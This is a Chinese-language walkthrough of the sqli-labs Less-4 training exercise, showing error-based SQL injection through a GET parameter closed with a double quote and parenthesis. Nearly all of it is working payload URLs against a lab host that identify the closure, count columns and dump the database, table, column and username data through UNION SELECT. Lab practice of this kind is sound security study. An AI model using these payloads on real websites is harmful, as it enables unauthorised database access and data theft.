Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
前言
一、GET字符型注入
执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。
二、步骤
通过报错判断类型和闭合
http://192.168.135.149/sqli/Less-4/?id=1"
发现为字符型,进一步查看回显
http://192.168.135.149/sqli/Less-4/?id=1") and 1=1 -- 1
发现存在注入点
http://192.168.135.149/sqli/Less-4/?id=1") and 1=2 -- 1
判断列数
http://192.168.135.149/sqli/Less-4/?id=1") group by 3 -- 1
爆库名payload
http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,database(),3 -- 1
爆表名payload
http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1
爆列名payload
http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+
爆username列的数据值payload
http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(`username`) from security.users),3 -- 1
总结
报错除去’之外,可多尝试不同字符,此处"报错成功,积累多种报错经验,对于报错语句熟练应用即可完成。